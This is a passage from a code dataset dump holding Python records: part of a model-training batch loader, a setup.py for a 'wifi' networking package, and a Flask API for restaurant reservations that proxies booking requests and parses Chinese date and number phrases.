batch_size\n self.batches = []\n\n sorted_idxs = np.argsort([len(x) for x in src])\n src = src[sorted_idxs]\n tgt = tgt[sorted_idxs]\n guess = guess[sorted_idxs]\n src_lens = [len(x) for x in src]\n tgt_lens = [len(x) for x in tgt]\n guess_lens = [len(x) for x in guess]\n\n # prepare batches\n s_idx = 0\n while s_idx < src.shape[0]:\n e_idx = s_idx + 1\n max_src_in_batch = src_lens[s_idx]\n max_guess_in_batch = guess_lens[s_idx]\n max_tgt_in_batch = tgt_lens[s_idx]\n while e_idx < src.shape[0]:\n max_src_in_batch = max(max_src_in_batch, src_lens[e_idx])\n max_guess_in_batch = max(max_guess_in_batch, guess_lens[e_idx])\n max_tgt_in_batch = max(max_tgt_in_batch, tgt_lens[e_idx])\n num_toks = (e_idx - s_idx + 1) * max(max_src_in_batch, max_tgt_in_batch, max_guess_in_batch)\n if num_toks > self.batch_size:\n break\n else:\n e_idx += 1\n\n batch = self.prepare_one_batch(\n src[s_idx:e_idx],\n guess[s_idx:e_idx],\n tgt[s_idx:e_idx],\n src_lens[s_idx:e_idx],\n guess_lens[s_idx:e_idx],\n tgt_lens[s_idx:e_idx])\n self.batches.append(batch)\n s_idx = e_idx\n\n self.indices = list(range(len(self.batches)))\n\n def __len__(self):\n return len(self.batches)\n\n def prepare_one_batch(self, src, guess, tgt, src_lens, guess_lens, tgt_lens):\n num_sents = len(src)\n max_src_len = max(src_lens)\n max_guess_len = max(guess_lens)\n max_tgt_len = max(tgt_lens)\n\n src_batch = np.zeros([num_sents, max_src_len], dtype=np.int32)\n guess_batch = np.zeros([num_sents, max_guess_len], dtype=np.int32)\n tgt_batch = np.zeros([num_sents, max_tgt_len], dtype=np.int32)\n target_batch = np.zeros([num_sents, max_tgt_len], dtype=np.int32)\n\n for i in range(num_sents):\n src_batch[i] = src[i] + (max_src_len - src_lens[i]) * [ac.PAD_ID]\n guess_batch[i] = guess[i] + (max_guess_len - guess_lens[i]) * [ac.PAD_ID]\n tgt_batch[i] = tgt[i] + (max_tgt_len - tgt_lens[i]) * [ac.PAD_ID]\n target_batch[i] = tgt[i][1:] + [ac.EOS_ID] + (max_tgt_len - tgt_lens[i]) * [ac.PAD_ID]\n\n src_batch = torch.from_numpy(src_batch).type(torch.long)\n guess_batch = torch.from_numpy(guess_batch).type(torch.long)\n tgt_batch = torch.from_numpy(tgt_batch).type(torch.long)\n target_batch = torch.from_numpy(target_batch).type(torch.long)\n return src_batch, guess_batch, tgt_batch, target_batch\n\n def get_iter(self, shuffle=False):\n if shuffle:\n np.random.shuffle(self.indices)\n\n for idx in self.indices:\n yield self.batches[idx]","sub_path":"data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":12117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"138109264","text":"#!/usr/bin/env python\nfrom setuptools import setup, Command\nimport os\n\n__doc__ = \"\"\"\nCommand line tool and library wrappers around iwlist and\n/etc/network/interfaces.\n\"\"\"\n\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\ninstall_requires = [\n 'setuptools',\n 'pbkdf2',\n 'netaddr'\n]\ntry:\n import argparse\nexcept:\n install_requires.append('argparse')\n\nversion = '1.0.1'\n\nEXTRAS = [\n ('/etc/bash_completion.d/', [('extras/wifi-completion.bash', 'wifi-completion', 0o644)])\n]\n\n\ndef get_extra_tuple(entry):\n if isinstance(entry, (tuple, list)):\n if len(entry) == 2:\n path, mode = entry\n filename = os.path.basename(path)\n elif len(entry) == 3:\n path, filename, mode = entry\n elif len(entry) == 1:\n path = entry[0]\n filename = os.path.basename(path)\n mode = None\n else:\n return None\n\n else:\n path = entry\n filename = os.path.basename(path)\n mode = None\n\n return path, filename, mode\n\n\nclass InstallExtrasCommand(Command):\n description = \"install extras like init scripts and config files\"\n user_options = [(\"force\", \"F\", \"force overwriting files if they already exist\")]\n\n def initialize_options(self):\n self.force = None\n\n def finalize_options(self):\n if self.force is None:\n self.force = False\n\n def run(self):\n global EXTRAS\n import shutil\n import os\n\n for target, files in EXTRAS:\n for entry in files:\n extra_tuple = get_extra_tuple(entry)\n if extra_tuple is None:\n print(\"Can't parse entry for target %s, skipping it: %r\" % (target, entry))\n continue\n\n path, filename, mode = extra_tuple\n target_path = os.path.join(target, filename)\n\n path_exists = os.path.exists(target_path)\n if path_exists and not self.force:\n print(\"Skipping copying %s to %s as it already exists, use --force to overwrite\" % (path, target_path))\n continue\n\n try:\n shutil.copy(path, target_path)\n if mode:\n os.chmod(target_path, mode)\n print(\"Copied %s to %s and changed mode to %o\" % (path, target_path, mode))\n else:\n print(\"Copied %s to %s\" % (path, target_path))\n except Exception as e:\n if not path_exists and os.path.exists(target_path):\n # we'll try to clean up again\n try:\n os.remove(target_path)\n except:\n pass\n\n import sys\n print(\"Error while copying %s to %s (%s), aborting\" % (path, target_path, e.message))\n sys.exit(-1)\n\n\nclass UninstallExtrasCommand(Command):\n description = \"uninstall extras like init scripts and config files\"\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n global EXTRAS\n import os\n\n for target, files in EXTRAS:\n for entry in files:\n extra_tuple = get_extra_tuple(entry)\n if extra_tuple is None:\n print(\"Can't parse entry for target %s, skipping it: %r\" % (target, entry))\n\n path, filename, mode = extra_tuple\n target_path = os.path.join(target, filename)\n try:\n os.remove(target_path)\n print(\"Removed %s\" % target_path)\n except Exception as e:\n print(\"Error while deleting %s from %s (%s), please remove manually\" % (filename, target, e.message))\n\n\nsetup(\n name='wifi',\n version=version,\n author='Rocky Meza, Gavin Wahl',\n author_email='rockymeza@gmail.com',\n description=__doc__,\n long_description='\\n\\n'.join([read('README.rst'), read('CHANGES.rst')]),\n packages=['wifi'],\n scripts=['bin/wifi'],\n test_suite='tests',\n platforms=[\"Debian\"],\n license='BSD',\n install_requires=install_requires,\n classifiers=[\n \"License :: OSI Approved :: BSD License\",\n \"Topic :: System :: Networking\",\n \"Operating System :: POSIX :: Linux\",\n \"Environment :: Console\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.3\",\n ],\n cmdclass={\n 'install_extras': InstallExtrasCommand,\n 'uninstall_extras': UninstallExtrasCommand\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"567708288","text":"# -*- coding: utf-8 -*-\nfrom flask import Response\nfrom flask import request\nfrom flask_restful import Resource\nfrom dateutil.parser import parse\nfrom langconv import Converter\nfrom datetime import datetime\nfrom datetime import timedelta\nimport json\nimport re\nimport requests\nimport constants\nimport logging\nLOG = logging.getLogger(__name__)\n\n\ndef setup_route(api):\n \"\"\"\n return map of endpoint and handler\n \"\"\"\n api.add_resource(ConvertParams, '/restaurant/convert_params')\n api.add_resource(ConvertParamsNLU1, '/restaurant/convert_params_nlu1')\n api.add_resource(ConvertParamsNLU2, '/restaurant/convert_params_nlu2')\n \n api.add_resource(SearchRestaurant, '/restaurant/search')\n api.add_resource(BookRestaurant, '/restaurant/book')\n api.add_resource(ListMoreOptions, '/restaurant/more_opts')\n api.add_resource(ListRequerements, '/restaurant/requirements')\n api.add_resource(UpdateRequerements, '/restaurant/opd_requirements')\n api.add_resource(ResetParams, '/restaurant/reset_params')\n\n api.add_resource(SearchReserveOrderByPhone, '/reserve_order/search_by_phone')\n api.add_resource(SearchReserveOrderBySeriesNumber, '/reserve_order/search_by_series_number')\n api.add_resource(CancelReserveOrder, '/reserve_order/cancel')\n api.add_resource(EditReserveOrder, '/reserve_order/edit')\n\n # inline booking\n api.add_resource(InlineStartBooking, '/VBooking/rest/inline/startBooking')\n api.add_resource(InlineDoBooking, '/VBooking/rest/inline/doBooking')\n api.add_resource(InlineEndBooking, '/VBooking/rest/inline/endBooking')\n\ndef encapsule_rtn_format(update_kv_map, remove_kv_map):\n rtn_obj = {\n \"status_code\": 0,\n \"msg_response\": {}\n }\n if update_kv_map is not None:\n rtn_obj['msg_response']['update'] = update_kv_map\n if remove_kv_map is not None:\n rtn_obj['msg_response']['remove'] = remove_kv_map\n return rtn_obj\n\ndef get_num(num_str):\n # turn the number represented by chinese to number string.\n payload = {\n \"id\": \"integer-number\",\n \"hasContext\": False,\n \"query\": Converter('zh-hans').convert(num_str)\n }\n payload = json.dumps(payload, ensure_ascii=False)\n payload = payload.encode('utf-8')\n headers = {'content-type': 'application/json'}\n r = requests.post(constants.TDE_URL, payload, timeout=float(constants.REQUEST_TIMEOUT), headers=headers)\n r_obj = r.json()\n # LOG.info(json.dumps(r_obj, ensure_ascii=False, indent=4))\n try :\n num = r_obj['informs'][0]['value']['displayText']\n except :\n num = None\n LOG.error('type error form num_str')\n return num\n\ndef get_phone_num(num_str):\n # turn the phone number represented by chinese to number string.\n payload = {\n \"id\": \"phone\",\n \"hasContext\": False,\n \"arguments\":{\n \"regions\" : [\"mainland\",\"tw\"],\n \"types\":[\"mobile\",\"landline\"]\n },\n \"query\": Converter('zh-hans').convert(num_str)\n }\n payload = json.dumps(payload, ensure_ascii=False)\n payload = payload.encode('utf-8')\n headers = {'content-type': 'application/json'}\n r = requests.post(constants.TDE_URL, payload, timeout=float(constants.REQUEST_TIMEOUT), headers=headers)\n r_obj = r.json()\n # LOG.info(json.dumps(r_obj, ensure_ascii=False, indent=4))\n try:\n phone = r_obj['informs'][0]['value']['displayText']\n except:\n phone = None\n LOG.error('type error form phone num_str')\n return phone\n\ndef get_hourtime(hour_str):\n # get the turely data time ex : hh:mm:ss \n payload = {\n \"id\": \"chrono\",\n \"hasContext\": True,\n \"arguments\": {\n \"orientation\": \"future\",\n \"timePoint\": {\n \"onlyOne\": \"last\",\n \"distinguishType\": False\n },\n \"duration\": {\n \"extract\": False,\n \"onlyOne\": \"last\"\n }\n },\n \"query\": Converter('zh-hans').convert(hour_str),\n }\n payload = json.dumps(payload, ensure_ascii=False)\n payload = payload.encode('utf-8')\n headers = {'content-type': 'application/json'}\n r = requests.post(constants.TDE_URL, payload, timeout=float(constants.REQUEST_TIMEOUT), headers=headers)\n # error_msg = 'API invocation fail,url:%s, status_code:%s, response:%s'\\\n # % (constants.TDE_URL, r.status_code, r.text)\n # LOG.error(error_msg)\n r_obj = r.json()\n\n \n # LOG.info(json.dumps(r_obj, ensure_ascii=False, indent=4))\n minute = 'minute_enable'\n try:\n if 'minute' not in r_obj['informs'][0]['value']['chrono']['time']['items'][0]:\n minute = 'minute_disable'\n hour = r_obj['informs'][0]['value']['chrono']['time']['items'][0]['hour']\n except:\n hour = None\n LOG.error('type error form exact_hour')\n return hour, minute\n \ndef get_datetime(datetime_str):\n # get the turely data time ex : yyyy-mm-dd hh:mm:ss\n payload = {\n \"id\": \"chrono\",\n \"hasContext\": True,\n \"arguments\": {\n \"orientation\": \"future\",\n \"timePoint\": {\n \"onlyOne\": \"last\",\n \"distinguishType\": False\n },\n \"duration\": {\n \"extract\": False,\n \"onlyOne\": \"last\"\n }\n },\n \"query\": Converter('zh-hans').convert(datetime_str),\n }\n payload = json.dumps(payload, ensure_ascii=False)\n payload = payload.encode('utf-8')\n headers = {'content-type': 'application/json'}\n r = requests.post(constants.TDE_URL, payload, timeout=float(constants.REQUEST_TIMEOUT), headers=headers)\n r_obj = r.json() \n # error_msg = 'API invocation fail,url:%s, status_code:%s, response:%s'\\\n # % (constants.TDE_URL, r.status_code, r.text)\n # LOG.error(error_msg)\n # LOG.info(json.dumps(r_obj, ensure_ascii=False, indent=4))\n try:\n dt = parse(r_obj['informs'][0]['value']['chrono']['time']['items'][0]['ISO_DATE']['single'])\n except :\n dt = None\n LOG.error('type error form exact_date')\n return dt\n \ndef MotherDay():\n payload = {\n \"id\": \"chrono\",\n \"hasContext\": True,\n \"arguments\": {\n \"orientation\": \"future\",\n \"timePoint\": {\n \"onlyOne\": \"last\",\n \"distinguishType\": False\n },\n \"duration\": {\n \"extract\": False,\n \"onlyOne\": \"last\"\n }\n },\n \"query\": Converter('zh-hans').convert(u'五月一號'),\n }\n payload = json.dumps(payload, ensure_ascii=False)\n payload = payload.encode('utf-8')\n headers = {'content-type': 'application/json'}\n r = requests.post(constants.TDE_URL, payload, timeout=float(constants.REQUEST_TIMEOUT), headers=headers)\n r_obj = r.json()\n dt = parse(r_obj['informs'][0]['value']['chrono']['time']['items'][0]['ISO_DATE']['single'])\n weekDay = r_obj['informs'][0]['value']['chrono']['time']['items'][0]['ISO_DATE']['weekDay']\n if weekDay == 'MONDAY':\n dt += timedelta(days=13)\n elif weekDay == 'TUESDAY':\n dt += timedelta(days=12)\n elif weekDay == 'WEDNESDAY':\n dt += timedelta(days=11)\n elif weekDay == 'THURSDAY':\n dt += timedelta(days=10)\n elif weekDay == 'FRIDAY':\n dt += timedelta(days=9)\n elif weekDay == 'SATURDAY':\n dt += timedelta(days=8)\n elif weekDay == 'SUNDAY':\n dt += timedelta(days=7)\n return dt\n\ndef search_holiday(holiday_str):\n hdt = datetime.strptime(\"1900-01-01\", '%Y-%m-%d')\n if holiday_str == u'父亲节':\n hdt = datetime.strptime(\"1900-08-08\", '%Y-%m-%d')\n elif holiday_str == u'母亲节':\n hdt = MotherDay()\n elif holiday_str == u'儿童节':\n hdt = datetime.strptime(\"1900-04-04\", '%Y-%m-%d')\n elif holiday_str == u'母亲节':\n hdt = datetime.strptime(\"1900-04-04\", '%Y-%m-%d')\n elif holiday_str == u\"国庆日\":\n hdt = datetime.strptime(\"1900-10-10\", '%Y-%m-%d')\n elif holiday_str == u\"二二八\":\n hdt = datetime.strptime(\"1900-2-28\", '%Y-%m-%d')\n elif holiday_str == u\"初一\":\n hdt = get_datetime(u'农历一月一日')\n elif holiday_str == u\"初二\":\n hdt = get_datetime(u'农历一月二日')\n elif holiday_str == u\"初三\":\n hdt = get_datetime(u'农历一月三日')\n elif holiday_str == u\"初四\":\n hdt = get_datetime(u'农历一月四日')\n elif holiday_str == u\"初五\":\n hdt = get_datetime(u'农历一月五日')\n elif holiday_str == u\"七夕情人节\":\n hdt = get_datetime(u'七夕')\n elif holiday_str == u'情人节':\n LunarValentineDay = get_datetime(u'七夕')\n ValentineDay = get_datetime(u'情人节')\n Today = get_datetime(u'今天')\n if (ValentineDay - Today) > (LunarValentineDay - Today) :\n hdt = LunarValentineDay\n else:\n hdt = ValentineDay\n else:\n hdt = get_datetime(holiday_str)\n return hdt\n\nclass InlineStartBooking(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hant').convert(request.stream.read().decode('utf-8')))\n LOG.debug('In StartBooking, data received from TE: %s' % json.dumps(json_from_request, ensure_ascii=False, indent=4))\n user_id = json_from_request['user_id']\n text = json_from_request['text']\n task_info = json_from_request['task_info']\n from_sip = task_info.get('from_sip', '')\n caller_id = task_info.get('caller_id', '')\n uuid = task_info.get('meta_uuid', '')\n payload = {\n \"user_id\": user_id,\n \"text\": text,\n \"task_info\": {\n \"from_sip\": from_sip,\n \"caller_id\": caller_id,\n \"uuid\": uuid,\n }\n }\n url = constants.SYSTEX_URL+'inline/startBooking'\n LOG.debug('request inline start booking API: %s' % url)\n LOG.debug('payload: %s' % json.dumps(payload, ensure_ascii=False, indent=4))\n r = requests.post(\n url,\n json=payload,\n timeout=float(constants.REQUEST_TIMEOUT)\n )\n r_obj = r.json()\n LOG.debug('response: %s' % json.dumps(r_obj, ensure_ascii=False, indent=4))\n ret = encapsule_rtn_format(r_obj[\"msg_response\"][\"update\"], None)\n return Response(json.dumps(ret), status=200)\n\n\nclass InlineDoBooking(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hans').convert(request.stream.read().decode('utf-8')))\n task_info = json_from_request['task_info']\n te_payload = {\n \"user_id\": json_from_request['user_id'],\n \"text\": json_from_request['text'],\n \"task_info\": {\n \"from_sip\": task_info.get('from_sip', None),\n \"caller_id\": task_info.get('caller_id', None), \n \"restaurant_id\": task_info.get('restaurant_id', None),\n \"time_date\": task_info.get('time_date', None),\n \"time_time\": task_info.get('time_time', None),\n \"seat_num\": task_info.get('seat_num', None),\n \"kid_num\": task_info.get('seat_num_children', None),\n \"chair_num\": task_info.get('chair_num', None) ,# if \"chair_num\" in task_info else 0\n \"lastname\": task_info.get('lastname', None),\n \"phone\": task_info.get('phone', None),\n \"note\": task_info.get('note', None),\n \"uuid\": task_info.get('meta_uuid', None),\n }\n }\n LOG.debug('In doBooking, data received from TE: %s' % json.dumps(te_payload, ensure_ascii=False, indent=4))\n #TODO 為什麼要分 te_payload 和 payload兩部分來寫,之後有時間統整一下好了\n task_info = te_payload['task_info']\n payload = {\n \"user_id\": te_payload['user_id'],\n \"text\": te_payload['text'],\n \"task_info\": {\n \"from_sip\": task_info['from_sip'] if task_info['from_sip'] is not None else '',\n \"caller_id\": task_info['caller_id'] if task_info['caller_id'] is not None else '', \n \"restaurant_id\": task_info['restaurant_id'] if task_info['restaurant_id'] is not None else '',\n \"date\": task_info['time_date'] if task_info['time_date'] is not None else '',\n \"time\": task_info['time_time'] if task_info['time_time'] is not None else '',\n \"group_num\": int(task_info['seat_num']) if task_info['seat_num'] is not None else 0,\n \"kid_num\": int(task_info['kid_num']) if task_info['kid_num'] is not None and task_info['kid_num'] != \"null\" else 0,\n \"chair_num\": int(get_num(task_info['chair_num'])) if task_info['chair_num'] is not None and task_info['chair_num'] != \"seat_num_children\" else 0,\n \"lastname\": task_info['lastname'] if task_info['lastname'] is not None else '',\n \"phone\": get_phone_num(task_info['phone']) if task_info['phone'] is not None else '',\n \"note\": task_info['note'] if task_info['note'] is not None else '',\n \"uuid\": task_info['uuid'] if task_info['uuid'] is not None else '',\n }\n }\n # user在詢問寶寶椅時如果說\"全部都要\",椅子張數等於小孩人數\n if task_info['chair_num'] == \"seat_num_children\":\n payload['chair_num'] = int(get_num(task_info['kid_num']))\n url = constants.SYSTEX_URL+'inline/doBooking'\n LOG.debug('request inline do booking API: %s' % url)\n LOG.debug('payload: %s' % json.dumps(payload, ensure_ascii=False, indent=4))\n r = requests.post(\n url,\n json=payload,\n timeout=float(constants.REQUEST_TIMEOUT)\n )\n r_obj = r.json()\n LOG.debug('response: %s' % json.dumps(r_obj, ensure_ascii=False, indent=4))\n update_kv_map = r_obj[\"msg_response\"][\"update\"]\n # Assign 0 to chair_num if user doesn't want any baby chair\n if 'chair_num' not in json_from_request['task_info']:\n update_kv_map['chair_num'] = '0' \n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass InlineEndBooking(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hant').convert(request.stream.read().decode('utf-8')))\n user_id = json_from_request['user_id']\n text = json_from_request['text']\n task_info = json_from_request['task_info']\n from_sip = task_info.get('from_sip', '')\n caller_id = task_info.get('caller_id', '')\n phone = task_info.get('phone', '')\n uuid = task_info.get('meta_uuid', '')\n payload = {\n \"user_id\": user_id,\n \"text\": text,\n \"task_info\": {\n \"from_sip\": from_sip,\n \"caller_id\": caller_id,\n \"end_status\": task_info['end_status'],\n \"phone\": phone,\n \"uuid\": uuid,\n }\n }\n url = constants.SYSTEX_URL+'inline/endBooking'\n LOG.debug('request inline end booking API: %s' % url)\n LOG.debug('payload: %s' % json.dumps(payload, ensure_ascii=False, indent=4))\n r = requests.post(\n url,\n json=payload,\n timeout=float(constants.REQUEST_TIMEOUT)\n )\n r_obj = r.json()\n LOG.debug('response: %s' % json.dumps(r_obj, ensure_ascii=False, indent=4))\n \n # ret = encapsule_rtn_format(r_obj[\"msg_response\"], None)\n # return Response(json.dumps(ret), status=200)\n\nclass ListRequerements(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hant').convert(request.stream.read().decode('utf-8')))\n user_id = json_from_request['user_id']\n text = json_from_request['text']\n restaurant_id = json_from_request['task_info']['restaurant_id']\n \n # request systex\n payload = {\n \"user_id\": user_id,\n \"text\": text,\n \"task_info\": { \n \"restaurant_id\": restaurant_id\n }\n }\n r = requests.post(constants.SYSTEX_URL+'restaurant/qryRestaurantOpts', json=payload, timeout=float(constants.REQUEST_TIMEOUT))\n r_obj = r.json()\n LOG.info(json.dumps(r_obj, ensure_ascii=False))\n \n ret = encapsule_rtn_format(r_obj[\"msg_response\"][\"update\"], None)\n return Response(json.dumps(ret), status=200)\n\nclass UpdateRequerements(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hant').convert(request.stream.read().decode('utf-8')))\n user_id = json_from_request['user_id']\n text = json_from_request['text']\n booking_id = json_from_request['task_info']['booking_id']\n\n # request systex\n payload = {\n \"user_id\": user_id,\n \"text\": text,\n \"task_info\": { \n \"id\": booking_id\n }\n }\n for i in range(1,4):\n if 'opt'+str(i)+'_yn' in json_from_request['task_info']:\n payload['task_info']['opt'+str(i)+'_yn'] = json_from_request['task_info']['opt'+str(i)+'_yn'].replace('yes', 'Y').replace('no', 'N')\n if 'opt'+str(i)+'_num' in json_from_request['task_info']:\n payload['task_info']['opt'+str(i)+'_num'] = json_from_request['task_info']['opt'+str(i)+'_num']\n r = requests.post(constants.SYSTEX_URL+'booking/updBookingOpts', json=payload, timeout=float(constants.REQUEST_TIMEOUT))\n r_obj = r.json()\n LOG.info(json.dumps(r_obj, ensure_ascii=False))\n \n ret = encapsule_rtn_format({}, None)\n return Response(json.dumps(ret), status=200)\n\nclass EditReserveOrder(Resource):\n def post(self):\n update_kv_map = {\n \"status\": \"succeed\"\n }\n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass CancelReserveOrder(Resource):\n def post(self):\n update_kv_map = {\n \"status\": \"succeed\"\n }\n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass ListMoreOptions(Resource):\n def post(self):\n json_from_request = json.loads(request.stream.read())\n if 'more_opts_order' not in json_from_request['task_info']:\n update_kv_map = {\n \"more_opts\": u\"明天晚上六点或是明天晚上八点\",\n \"more_opts_order\": 1\n }\n elif json_from_request['task_info']['more_opts_order'] == 1:\n update_kv_map = {\n \"more_opts\": u\"后天或是大后天\",\n \"more_opts_order\": 2\n }\n elif json_from_request['task_info']['more_opts_order'] == 2:\n update_kv_map = {\n \"more_opts\": u\"南京东路店或是中山店\",\n \"more_opts_order\": 3\n }\n else:\n update_kv_map = {\n \"more_opts_order\": -1\n }\n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass SearchReserveOrderBySeriesNumber(Resource):\n def post(self):\n json_from_request = json.loads(request.stream.read())\n series_number = json_from_request['task_info']['series_number']\n update_kv_map = None\n if series_number == u'AABB28825252':\n update_kv_map = {\n \"restaurant\": u\"王品牛排\",\n \"time\": \"2018-03-19 19:00:00\",\n \"seat_num\": 5\n }\n else:\n pass\n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass SearchReserveOrderByPhone(Resource):\n def post(self):\n json_from_request = json.loads(request.stream.read())\n phone = json_from_request['task_info']['phone']\n update_kv_map = None\n if phone == u'0912345678':\n update_kv_map = {\n \"order_list\": [\n {\n \"restaurant\": u\"王品牛排\",\n \"time\": \"2018-03-19 19:00:00\",\n \"seat_num\": 5,\n \"series_number\": \"AABB28825252\"\n }\n ]\n }\n elif phone == u'0912345677':\n update_kv_map = {\n \"order_list\": [\n {\n \"restaurant\": u\"王品牛排\",\n \"time\": \"2018-03-20 19:00:00\",\n \"seat_num\": 3,\n \"series_number\": \"AABB28825253\"\n },\n {\n \"restaurant\": u\"西堤牛排\",\n \"time\": \"2018-03-28 19:00:00\",\n \"seat_num\": 4,\n \"series_number\": \"AABB28825254\"\n }\n ]\n }\n else:\n pass\n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass ConvertParamsNLU1(Resource):\n def post(self):\n json_from_request = json.loads(request.stream.read())\n LOG.info(json.dumps(json_from_request['task_info'], ensure_ascii=False))\n date_time = json_from_request['task_info'][u'用餐时间_utc']\n seat_num_total = json_from_request['task_info'][u'人数_raw']['total']\n restaurant = json_from_request['task_info'][u'餐厅']\n\n dt = parse(date_time)\n\n update_kv_map = {\n \"restaurant\": restaurant,\n \"time_date\": dt.strftime(\"%Y%m%d\"),\n \"time_time\": dt.strftime(\"%H:%M\"),\n \"time_str\": dt.strftime(\"%Y年%m月%d日%H点%M分\"),\n \"seat_num_total\": seat_num_total\n }\n \n if 'adult' in json_from_request['task_info'][u'人数_raw']:\n update_kv_map['seat_num'] = json_from_request['task_info'][u'人数_raw']['adult']\n if 'child' in json_from_request['task_info'][u'人数_raw']:\n update_kv_map['seat_num_children'] = json_from_request['task_info'][u'人数_raw']['child']\n\n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\nclass ConvertParamsNLU2(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hans').convert(request.stream.read().decode('utf-8')))\n\n # print the format of json\n LOG.debug('In ConvertParamsNLU2, data received from TE: %s' % json.dumps(json_from_request['task_info'], ensure_ascii=False, indent=4))\n\n # parser time\n exact_date = json_from_request['task_info']['exact_date']\n exact_hour = json_from_request['task_info']['exact_hour']\n exact_minute = json_from_request['task_info']['exact_minute']\n time_time = \"{hour}:{minute}\".format(hour = exact_hour,minute = exact_minute)\n\n # parse exact date\n dt = get_datetime(exact_date)\n exact_hour = int(get_num(exact_hour))\n exact_minute = int(get_num(exact_minute))\n\n LOG.info('hour:'+str(exact_hour)+' minute:'+str(exact_minute))\n dt = dt.replace(hour=exact_hour, minute=exact_minute)\n \n update_kv_map = {\"time_time\": time_time}\n if exact_minute > 0 :\n update_kv_map['time_str'] = dt.strftime(\"%m{M}%d{d}%H{h}%M{m}\").format(M='月', d='日', h='點', m='分')\n else :\n update_kv_map['time_str'] = dt.strftime(\"%m{M}%d{d}%H{h}\").format(M='月', d='日', h='點')\n \n ret = encapsule_rtn_format(update_kv_map, None)\n return Response(json.dumps(ret), status=200)\n\n\nclass ConvertParams(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hans').convert(request.stream.read().decode('utf-8')))\n\n # print the format of json\n LOG.debug('In ConvertParams, data received from TE: %s' % json.dumps(json_from_request['task_info'], ensure_ascii=False, indent=4))\n\n remove_kv_map = {}\n update_kv_map = {}\n\n # parse seat number\n if 'seat_num' not in json_from_request['task_info']:\n seat_num_total = 0\n else:\n seat_num = get_num(json_from_request['task_info']['seat_num'])\n update_kv_map[\"seat_num\"] = seat_num\n seat_num_total = seat_num\n \n # parse children seat number and chair number\n seat_num_children = 0\n if 'seat_num_children' in json_from_request['task_info'] and json_from_request['task_info']['seat_num_children'] != \"null\":\n seat_num_children = get_num(json_from_request['task_info']['seat_num_children'])\n seat_num_total = int(seat_num_total) + int(seat_num_children)\n\n # parser date\n exact_date = json_from_request['task_info']['exact_date']\n exact_hour = json_from_request['task_info']['exact_hour']\n\n exact_minute = '0'\n \n if 'exact_minute' in json_from_request['task_info']:\n exact_minute = json_from_request['task_info']['exact_minute']\n if exact_minute == u'半':\n exact_minute = '30'\n\n # parse exact date\n if 'holiday' in json_from_request['task_info']:\n dt = search_holiday(json_from_request['task_info']['holiday'])\n else:\n dt = get_datetime(exact_date)\n \n time_judge = re.compile(u'(早|晚|凌晨|上午|中午|下午|晚上)').search(exact_hour)\n if time_judge is not None:\n time_judge = time_judge.group(1)\n\n exact_hour, minute = get_hourtime(exact_hour)\n if minute == 'minute_disable':\n exact_minute = '0'\n\n # opening hours from 9am to 10pm \n\n if time_judge in [u'晚',u'中午',u'下午',u'晚上']:\n if exact_hour < 12:\n exact_hour += 12\n\n if exact_hour < 10:\n exact_hour += 12\n elif exact_hour > 22:\n exact_hour-=12\n\n exact_minute = get_num(exact_minute)\n\n # LOG.info('hour:'+str(exact_hour)+' minute:'+str(exact_minute))\n remove_kv_map= {}\n if dt == None:\n update_kv_map[\"exact_minute\"] = exact_minute\n update_kv_map[\"seat_num_total\"] = seat_num_total\n remove_kv_map['time_str'] = None\n \n else:\n dt = dt.replace(hour=exact_hour, minute=int(exact_minute))\n update_kv_map[\"time_date\"] = dt.strftime(\"%Y%m%d\")\n update_kv_map[\"time_time\"] = dt.strftime(\"%H:%M\")\n update_kv_map[\"exact_minute\"] = exact_minute\n update_kv_map[\"seat_num_total\"] = seat_num_total\n # date format not include minute if minute more than zero\n if int(exact_minute) > 0 :\n update_kv_map['time_str'] = dt.strftime(\"%m{M}%d{d}%H{h}%M{m}\").format(M='月', d='日', h='點', m='分')\n else :\n update_kv_map['time_str'] = dt.strftime(\"%m{M}%d{d}%H{h}\").format(M='月', d='日', h='點')\n \n if seat_num_children != 0:\n update_kv_map['seat_num_children'] = seat_num_children\n\n remove_kv_map['holiday'] = None\n ret = encapsule_rtn_format(update_kv_map, remove_kv_map)\n return Response(json.dumps(ret), status=200)\n\nclass SearchRestaurant(Resource):\n def post(self):\n json_from_request = json.loads(Converter('zh-hant').convert(request.stream.read().decode('utf-8')))\n user_id = json_from_request['user_id']\n\n text = json_from_request['text']\n date = json_from_request['task_info']['time_date']\n time = json_from_request['task_info']['time_time']\n seat_num_total = json_from_request['task_info']['seat_num_total']\n restaurant = json_from_request['task_info']['restaurant']\n\n # request systex\n payload = {\n \"user_id\": user_id,\n \"text\": text,\n \"task_info\": { \n \"date\": date,\n \"time\": time,\n \"seat_num\": seat_num_total,\n \"restaurant_name\": restaurant\n }\n }\n r = requests.post(constants.SYSTEX_URL+'booking/searchBooking', json=payload, timeout=float(constants.REQUEST_TIMEOUT))\n r_obj = r.json()\n LOG.info(json.dumps(r_obj, ensure_ascii=False))\n \n # response\n 